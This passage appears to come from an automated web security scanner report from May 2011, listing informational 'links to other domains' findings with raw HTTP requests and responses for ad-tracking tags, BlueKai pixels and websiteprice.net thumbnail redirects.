Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; subID="{}"; impressions="{\"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]}"; camp_freq_p1="eJzjkuF49ZlFgFFi4+0vb1kUGDV2vgTSBowWYD6XCMeK+axA2cl9p4GyDBoMBgwWDEDRnfeZgaKz5q9FiAIA+4cX7Q=="; io_freq_p1="eJzjkuY4HijAKLHx9pe3LAqMGm9BtAGjBZjPJcyxLRQoObnvNFCSQYPBgMGCASi41wUoOGv+WoQgAJWpFmw="; dp_rec="{\"3\": 1303562003+ \"2\": 1304243633}"; segments_p1=eJzjYuZYEMzFzHE0B0hMNwYSjRFcLBwHuxmBzHMgwdM5QH5nBzOQOVEFyNyxi5GLi2PnPmaBWQfnvGMBCv8LBxIbi4Fy6z8wAsknF0Bk038mkBwHkHnoCIi53w/IvLiXCUg2/weRa/czAgCyXiCB; partnerUID="eyI3OSI6IFsiMTc1NGJiNjUwNjIzYzViZTQzZmNhMGI1N2MzOTEwZDkiLCB0cnVlXSwgIjE5OSI6IFsiQkRGQkZGQzIzMUEyODJENkUyNDQ1QjhFNERFNEEyRTAiLCB0cnVlXSwgIjQ4IjogWyI2MjEwOTQ3MDQ3Nzg2MzAwMjY4MjgzMzg0MjY0ODU0NzEyMjg3MCIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 02 May 2011 02:10:28 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 02-May-2011 02:10:08 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 376

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=300&external_user_id=8218888f-9a83-4760-bd14-33b4666730c0&Expiration=1304734228&custom_user_segments=%2C11265%2C49026%2C49027%2C50185%2C4625%2C6551%2C10656%2C24493%2C30767%2C14769%2C23864%2C57145%2C10047%2C17857%2C41538%2C13893%2C13899%2C13902%2C40657%2C26724%2C11262%2C1150"/>');

23.38. http://tags.bluekai.com/site/3945

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/3945

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /site/3945?ret=html&phint=__bk_t%3DWelcome%20%7C%20Japanator.com%3A%20anime%20news%2C%20original%20features%2C%20and%20weird%20stories%20from%20Japan%2C%20updated%20daily!&phint=__bk_k%3Danime%2C%20manga%2C%20japanimation%2C%20Japanese%20animation%2C%20news%2C%20information%2C%20reviews%2C%20forum%2C%20columns%2C%20answerman%2C%20shelf%20life%2C%20press%20releases%2C%20DVD%2C%20release%20dates%2C%20encyc%2C%20encyclopedia%2C%20cast%2C%20staff%2C%20seiyuu%2C%20otaku%2C%20Japan%20Blog%2C%20Japanator%2C%20ANN&limit=4&r=22181052 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101jqAtKWn9WuzOUD=; bkst=KJy5MgNvhW9DCVIh/sCuVx3nCVNQ4rd1kcsBbyGChmiViC1ZY/aLWjv/ntYdI9ot0MSYakRVFGcwRsaMjIFL+r5X4mK1Tc6qR9rboZTVxl1EFvDMIweH9jEz1R7YHDoqsT7v0zQuioahNZZ7iDeYk2dw7FdNdY8yHH9BT6JJvgkWnLlkHFKy9f9wJL2F0dB15i5L536mS2awYNRRfvoLtCjcAfdhitz4wqLcApQoA7uKAbxqpoJENUjUSmmInRXU2DRjOr+aooMQsQANMYA+Aas2dc702EQWYse/7OlimlcHpl+8Fdn8PfCIGCYkkD/u0iovYnsZvik3vbyov0pB8IL3dx5GsWZQ; bk=e1mPh2iZ/VKVIHOf; bkc=KJpM8sPQZsfY0nO88x84HQRsOATQd8Tvv+IhAysacXmYTn1OIKFZ1MvLHrnUGws7ZYeT7ay1e9KZ1beyD8oHIRTB3cyxMVpKqHPDX6crxISel94M9yODsYNN; bko=KJ0E8VBQtnh0CbXYQ0ux5Vqaek2ICiGQbIuucqb1e1qLe9pfyvyfF9y1vR+OnsXTuhU/0rROLHvOg9yySh/qC1U1999p5HUd; bkw5=KJpE+Z/9QCvsW6YuWzxWAo0X666Rs4uHjJCxjsfq/VuRDVEzfDcLW3QRCsEMgj7n0999mnyv5x==

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 01:58:50 GMT
Set-Cookie: bklc=4dbe0fda; expires=Wed, 04-May-2011 01:58:50 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=chBAO2thl+ZVIHOf; expires=Sat, 29-Oct-2011 01:58:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJpn8s5QIwsRAKWVdp84HQRsCAyQUI6HvkXjMS2P0TeYjboW8UBPGwJ4Jvc0ozPHIEWLYeT7nywe5OBsCL6g5Xe82NHxIRb5eYCXAcTR7yl/UpKUAVWNWgXsMEdaO1c78sJQmeY59RV46Gpv5th98RBGjwBr3bYSel/41CdAwCQ491l+ugD=; expires=Sat, 29-Oct-2011 01:58:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJynWtHQr1Vdp8KHxjSwQVcp0CtIYQ0uxBSjaE+XIHZ3Qv0EulR9jRljsHMtQPklKOARDCSeVBbXWnN1evo9PMRwuYyHvLq11/AByZJk999zIhAI; expires=Sat, 29-Oct-2011 01:58:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJh5MfNvhW9DCVIh/sCVY6+CLq9BpmI5ZEvrzPPRkCM5D7cYOYsyVTxATQFRnfbYMuQtQCjiRVa+RI1nVBMRtEgjuZ0dXlcmFHNTVQHRQsouEvqB8eHTccqQhS1B0nCMWGDnkqRtanZEGuDDxImL66TEQREwwZI2ddSlTZwktSBFMNSOvTJGsO5vDLAkzZZm8QrUuyegRJnAneLR0V3cfjbGpDnDQ8ukO3+XBYMEg48wf2bfP285QlTDoday7JYTSFqMwPPVhtiMrL0toXVXLCr6i6yhyEDuSCCEViYMKFjNTIBKa0Y9jrHLW8tnyloz0TLfp2IffuDvDPGoJvWLoTxxSdv1GgqYZipcpnyI+mfNXgXd4yc+WaPx; expires=Sat, 29-Oct-2011 01:58:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw5=KJpfoXU9y1OP049nunW0JnQh1e90zc/5Z1f9L1tDQzsBL8nC9M+/p1TuHsq0uTLp1sCq9HDpkeYzR9YJ1ROJE+foJGy1IAQ0EYQ0+I6x1LyG1rft/cRJP9hYLFcVpsPASc5QRWiE3sH/9Rr2zWYT9aUZJjv1QHwWw0OfrO7R7OcItxF6syBFJz1njoeqag+O2eOP1M999Jbv/oA=; expires=Sat, 29-Oct-2011 01:58:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 03-May-2011 01:58:50 GMT; path=/; domain=.bluekai.com
BK-Server: c45a
Content-Length: 997
Content-Type: text/html
Connection: keep-alive

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://ad.yieldmanager.com/pixel?id=1182722&id=1182795&id=1182798&id=1182799&id=1182843&t=2" width=1 height=1 border=0 alt="">
<img src="http://ads.bluelithium.com/pixel?adv=23351&code=BKW18109&t=2&rnd=792444851" width=1 height=1 border=0 alt="">
<img src="http://r.nexac.com/e/getdata.xgi?dt=br&pkey=ak930d7lx38dp&reppipe=%26phint%3D&repequal=%3D&ver=2&ru=http%3A%2F%2Ftags.bluekai.com%2Fsite%2F1407%3Flimit%3D0%26ret%3Dpixel%26phint%3Dnaid%3d%3Cna_id%3E%26phint%3Dna_da%3D%3Cna_da%3E" width=1 height=1 border=0 alt="">
<img src="http://s.ixiaa.com/digi/9D763773-52FA-4D45-8966-C91EFF22B643/a.gif?&redirect=http%3A%2F%2Ftags.bluekai.com%2Fsite%2F3754%3Fphint%3Dea%25253D%257BEA_value%257D%26phint%3Deb%25253D%257BEB_value%257D%26phint%3Dec%25253D%257BEC_value%257D%26phint%3Ded%25253D%257BED_value%257D%26phint%3Dee%25253D%257BEE_value%257D%26ret%3Dhtml%26id%3DPARTNER_UUID" width=1 height=1 border=0 alt="">

</div>
...[SNIP]...

23.39. http://tags.bluekai.com/site/3945

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/3945

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /site/3945?ret=html&phint=__bk_t%3DLogin%20%7C%20Japanator.com%3A%20anime%20news%2C%20original%20features%2C%20and%20weird%20stories%20from%20Japan%2C%20updated%20daily!&phint=__bk_k%3Danime%2C%20manga%2C%20japanimation%2C%20Japanese%20animation%2C%20news%2C%20information%2C%20reviews%2C%20forum%2C%20columns%2C%20answerman%2C%20shelf%20life%2C%20press%20releases%2C%20DVD%2C%20release%20dates%2C%20encyc%2C%20encyclopedia%2C%20cast%2C%20staff%2C%20seiyuu%2C%20otaku%2C%20Japan%20Blog%2C%20Japanator%2C%20ANN&limit=4&r=25552944 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101jqAtKWn9WuzOUD=; bklc=4dbe0f35; bk=iyfjJ95eAbmVIHOf; bkc=KJpn8s5QIwsRAzsD48XF/y1ex0SxgdR/kSI1h+K3jDeC1NViXgA3DwAFAke86rvGdOQVOJIEkTaCrQAMyISPmIeXK03G415mOCxIueI1pyqAg8Fn0n9SiPIeho2iQrOpzMWycJMmQ1JwSDqkmpSQXAW6L7ZlPPeBOfAwZx20cTyw9OinHmQ=; bko=KJ0pWVHQ1mU48XF//1FcynO88x84OxjJ/mF1iCtId9hPxBqJJEr9LLqLe9pfyvyfF9y1vR+Ons2KiaTZOkDQv8LcJJR/aVBZZ1xsRqW099YFQCSx; bkst=KJhkMg2ny69RCZXGYJgiTYQDO249d4prqGyNPGDxRguMTC6UCW9bCYEinnQUdTPruC5OOlayzcqhqlOyzUwNtAky4qf7d5blC88UWPoOEPPVAbbbYJbuc7gNSO+j83Q9fAvoM9k8TDHG1/axmImDD8Qej+wwKIIddl6CNkXXIFjG9psJ9EHkU9GiZ99Z2mZ0TUg+UInVG0tALIpuc3KitSzc8lv78m6GofZsoACc5qTfdOAXKc4ZlD66Mm/XELRjMoFrvebD5U1sJZogrpzok0l2ResYuL3j9Ay6oPJhGWHBFIfXK5OcvWO5bAyUU4sE5+0vZf77cdlaWQAQMm9YWNGxMncHCuVQee4SaZeNtI1XIxDtBPw5; bkw5=KJpfoXU9y1OP049nunW0JnQh1e90zc/5Z1f9L1tDQzsBL8nC9M+/p1TuHsq0uTLp1sCq9HDpkeYzR9YJ1ROJE+foJGy1IAQ0EYQ0+I6x1LyG1rft/cRJP9hYLFcVpsPASc5QRWiE3sH/9Rr2zWYT9aUZJjJ1eB9cen0PeYIRxu8RfySHRSoARwMZ94Wo09VzemzXWeTa91YC/2L=; bkdc=res

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 02:00:18 GMT
Set-Cookie: bklc=4dbe1032; expires=Wed, 04-May-2011 02:00:18 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=Ck/cgMBT0TsVIHOf; expires=Sat, 29-Oct-2011 02:00:18 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJpn8s5QIwsRAzsD48XFWy1nx0SxgdR/kSI1h+K3jDeC1NViXgA3DwAFAke86rvGdOQVOJIEkTaCrQAMyISPmlyjsHM9dcL33cpcEQRDwAQdM1Xs8vIq0XiysGk4QXS4RGnQzl/h1O0RpGeYEtks8ELtGwJOBnJ8+NPxpxK8e8AwzCI1eyOnk6DP; expires=Sat, 29-Oct-2011 02:00:18 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJynWtHQ1OnR8XF/R9BAZ4veVBbXWOREx0vDhzyyixtiMGBOkGIOR4wvcqTveJJ9NoAPmlp8sS39gJBn5QeNsg1p1myeLIT92SRLOgaDQShLcC9n91IJsWR=; expires=Sat, 29-Oct-2011 02:00:18 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhkMpNn96WxCgz/YYRhQ3Dxnsyw27Bt+ppMsHVmWW2Evrb0ClOyvzn5iqPQcdynB3nRYa3/CRVNMqdOyLqmNgNDyqEwwmd1myl6LGpxWig0nO2UIP7gmVbQBTXtAVVmYr9rA13RQv5mO9REYnxpEMZamV9tdqgldL4XY+a82KMcGpUWJ9qxkcWois9YZBecLyr58k0Yg+SJKOa5BC4tU7r6Q4HyKsTwObnRoUr7ziFMjEICiRRic4x70UqF+dFGlHFFg3BKsYPHwOgi3vQmG768vDf9CmUWfG0pVj5t3b8vJKP19uSSD3ATDvvZll5Ils6MNWnPyJA3FmOc8SQDPyIK4fqgJCJ9s1WaJMxkssmMD6+9sVb6Ezc32b4SFPl822L4ANHiwy==; expires=Sat, 29-Oct-2011 02:00:18 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw5=KJpfoXU9y1OP049nunW0JnQh1e90zc/5Z1f9LWDU/L1aonQjgCACjWTC0U9hdWVutVqvymesVzkyQH6AjZzJ/Mw8ozDjsnu+Q/GjuCCm1/eWs19AJI26W6Rs4uxjJCujtlR/sVRDsU5fWnLWvQRCtUCg8M/0+eLy1vHJPevAQ1PKmYOzQYgpWA7sy97ic89279hLpQMdh9eeQTslArWa1XC+b26QKoQ3sHMt/LAy10hsAF7ZQVpSmxIWSxORLem2; expires=Sat, 29-Oct-2011 02:00:18 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 03-May-2011 02:00:18 GMT; path=/; domain=.bluekai.com
BK-Server: a96f
Content-Length: 1032
Content-Type: text/html
Connection: keep-alive

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://ads.bluelithium.com/pixel?adv=23351&code=BKW18109&t=2&rnd=33632511" width=1 height=1 border=0 alt="">
<img src="http://s.ixiaa.com/digi/9D763773-52FA-4D45-8966-C91EFF22B643/a.gif?&redirect=http%3A%2F%2Ftags.bluekai.com%2Fsite%2F3754%3Fphint%3Dea%25253D%257BEA_value%257D%26phint%3Deb%25253D%257BEB_value%257D%26phint%3Dec%25253D%257BEC_value%257D%26phint%3Ded%25253D%257BED_value%257D%26phint%3Dee%25253D%257BEE_value%257D%26ret%3Dhtml%26id%3DPARTNER_UUID" width=1 height=1 border=0 alt="">
<img src="http://user.lucidmedia.com/clicksense/user?p=b3eff363c7abe313&r=1&" width=1 height=1 border=0 alt="">
<img src="http://adadvisor.net/adscores/g.pixel?sid=9204125787&bk_uuid=1FRgv9%2Fc99Y5TvhB&redir=http%3A%2F%2Ftags.bluekai.com%2Fsite%2F2831%3Fphint%3Dzip%3D%25%7Bzip%7D%26phint%3Dage%3D%25%7Bindiv1.age%7D%26phint%3Dgender%3D%25%7Bindiv1.gender%7D%26phint%3Dsegment%3D%25%7Bscore%7D%26id=PARTNER_UUID" width=1 height=1 border=0 alt="">

</div>
...[SNIP]...

23.40. http://usjobsresource.com/3/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usjobsresource.com
Path:   /3/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /3/?s=31s-2100u HTTP/1.1
Host: usjobsresource.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:33:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15206


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
</script>
<script src="http://j.maxmind.com/app/geoip.js"></script>
...[SNIP]...
<h1><a href=http://api.simplyhired.com/a/job-details/view/cparm-cF9pZD0yMTAxMiZ6b25lPTYmaXA9JmNvdW50PTUwJnN0YW1wPTIwMTEtMDUtMDEgMTY6MzM6MDkmcHVibGlzaGVyX2NoYW5uZWxfaWRzPSZhX2lkPTMwMzA2JmNfaWQ9MTMwNzYmY3BjPTEuMDYmcG9zPTEmaGFzaD00MTE0NGJlYTg3MzVlZTBjNjEzYjQzZTdiOGE3YWU3OA%3D%3D%3Bb2cac46ded3ebdbf905f9d9ba424eb62/jobkey-2af7295b5a9e2330be836b84fb8abc20e97b7bcf/pub_id-21012/cjp-0 target='_blank' onMouseDown='xml_sclk(this)'>New Business Development</a>
...[SNIP]...
<h1><a href=http://api.simplyhired.com/a/job-details/view/cparm-cF9pZD0yMTAxMiZ6b25lPTYmaXA9JmNvdW50PTUwJnN0YW1wPTIwMTEtMDUtMDEgMTY6MzM6MDkmcHVibGlzaGVyX2NoYW5uZWxfaWRzPSZhX2lkPTI4NzgxJmNfaWQ9MTI1MjgmY3BjPTEuMDUmcG9zPTImaGFzaD04NmI5OGFlOGE2NmMxZTI0MDA4Y2JmYjgyYzM5OTUxMQ%3D%3D%3B4bb30824015f569c983e2979a00a5566/jobkey-ade9b22f6b49e83c98c8041821e3773de9410/pub_id-21012/cjp-1 target='_blank' onMouseDown='xml_sclk(this)'>New F&I Business Manager</a>
...[SNIP]...
<h1><a href=http://api.simplyhired.com/a/job-details/view/cparm-cF9pZD0yMTAxMiZ6b25lPTYmaXA9JmNvdW50PTUwJnN0YW1wPTIwMTEtMDUtMDEgMTY6MzM6MDkmcHVibGlzaGVyX2NoYW5uZWxfaWRzPSZhX2lkPTg5NDcmY19pZD0xMDI2NCZjcGM9MC43MCZwb3M9MyZoYXNoPTRhZGY0MjU3OTk3OTgwZDU2YzNhMTZkOWQ3OTgzMmU0%3B91db1950f7cdc734a776895927154639/jobkey-15578.DUPE271649/pub_id-21012/cjp-2 target='_blank' onMouseDown='xml_sclk(this)'>Account Exec Business Sales</a>
...[SNIP]...
<h1><a href=http://api.simplyhired.com/a/job-details/view/cparm-cF9pZD0yMTAxMiZ6b25lPTYmaXA9JmNvdW50PTUwJnN0YW1wPTIwMTEtMDUtMDEgMTY6MzM6MDkmcHVibGlzaGVyX2NoYW5uZWxfaWRzPSZhX2lkPTEzNTc4JmNfaWQ9NzM0NyZjcGM9MC41NSZwb3M9NCZoYXNoPTYyZGEwOGExMDI4YzQ4YTc4ZGExOTgzYWUxZmMxMzVk%3Bed5e85fbab4a8302df93a26f872d6f09/jobkey-74cafac3a1667f795e65408ddbc9efd20f4c7d/pub_id-21012/cjp-3 target='_blank' onMouseDown='xml_sclk(this)'>Business Development Support Specialist</a>
...[SNIP]...
</script>

All Content Copyright .. 2011, USJR, LLC. <a href="http://useducationresource.com/jobs/jobs/" target="_blank">Click here for Job Information.</a> | <a href="http://useducationresource.com/mobile/privacy.php" target="_blank">Become an Affiliate.</a>
...[SNIP]...
</script> <script id="mstag_tops" type="text/javascript" src="//flex.atdmt.com/mstag/site/7a8a3b31-6681-4d89-825a-d834c1016c24/mstag.js"></script>
...[SNIP]...
<noscript> <iframe src="//flex.atdmt.com/mstag/tag/7a8a3b31-6681-4d89-825a-d834c1016c24/conversion.html?cp=5050&dedup=1" frameborder="0" scrolling="no" width="1" height="1" style="visibility:hidden; display:none"> </iframe>
...[SNIP]...

23.41. http://websiteprice.net/result/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://websiteprice.net
Path:   /result/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /result/?id=65934 HTTP/1.1
Host: websiteprice.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html
Expires: Mon, 02 May 2011 02:12:54 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:14:04 GMT
Content-Length: 10437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<div><a class="adHeadline" target="_top" href="http://www.adbrite.com/mb/commerce/purchase_form.php?opid=1794251&afsid=1">Your Ad Here</a>
...[SNIP]...
<div class="thumb">
<a href="http://onlinemicrofiche.com" target="_blank">
<img src="../thumb/?url_pic=onlinemicrofiche.com" alt="onlinemicrofiche.com" width="120" height="90" />
...[SNIP]...
<div><a class="adHeadline" target="_top" href="http://www.adbrite.com/mb/commerce/purchase_form.php?opid=1794251&afsid=1">Your Ad Here</a>
...[SNIP]...
<div><a target="_top" href="http://www.adbrite.com/mb/commerce/purchase_form.php?opid=1794248&afsid=1" style="font-weight:bold;font-family:Arial;font-size:13px;">Your Ad Here</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://resources.infolinks.com/js/infolinks_main.js"></script>
...[SNIP]...
</a>.&nbsp;This site uses <a href="http://www.thumbshots.com" target="_blank" title="This site uses Thumbshots previews" rel="nofollow">Thumbshots previews</a>.&nbsp;<a href="http://privacypolicy.cz" title="Informace o ochran.. osobn..ch ..daj.." rel="nofollow">PrivacyPolicy.cz</a>
...[SNIP]...

23.42. http://websiteprice.net/thumb/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://websiteprice.net
Path:   /thumb/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /thumb/?url_pic=heavenecom.com HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: websiteprice.net

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Content-Length: 183
Content-Type: text/html
Expires: Mon, 02 May 2011 02:08:29 GMT
Location: http://open.thumbshots.org/image.pxf?url=http://heavenecom.com
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:09:29 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://open.thumbshots.org/image.pxf?url=http://heavenecom.com">here</a>.</body>

23.43. http://websiteprice.net/thumb/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://websiteprice.net
Path:   /thumb/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /thumb/?url_pic=www.ebay.com HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: websiteprice.net

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Content-Length: 181
Content-Type: text/html
Expires: Mon, 02 May 2011 02:08:35 GMT
Location: http://open.thumbshots.org/image.pxf?url=http://www.ebay.com
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:09:35 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://open.thumbshots.org/image.pxf?url=http://www.ebay.com">here</a>.</body>

23.44. http://websiteprice.net/thumb/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://websiteprice.net
Path:   /thumb/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /thumb/?url_pic=segurosautobaratos.info HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: websiteprice.net

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Content-Length: 192
Content-Type: text/html
Expires: Mon, 02 May 2011 02:08:29 GMT
Location: http://open.thumbshots.org/image.pxf?url=http://segurosautobaratos.info
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:09:29 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://open.thumbshots.org/image.pxf?url=http://segurosautobaratos.info">here</a>.</body>

23.45. http://websiteprice.net/thumb/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://websiteprice.net
Path:   /thumb/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /thumb/?url_pic=www.febadesign.com HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: websiteprice.net

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Content-Length: 187
Content-Type: text/html
Expires: Mon, 02 May 2011 02:28:45 GMT
Location: http://open.thumbshots.org/image.pxf?url=http://www.febadesign.com
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:29:45 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://open.thumbshots.org/image.pxf?url=http://www.febadesign.com">here</a>.</body>

23.46. http://websiteprice.net/thumb/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://websiteprice.net
Path:   /thumb/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /thumb/?url_pic=www.austininsuranceguy.com HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: websiteprice.net

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Content-Length: 195
Content-Type: text/html
Expires: Mon, 02 May 2011 02:08:35 GMT
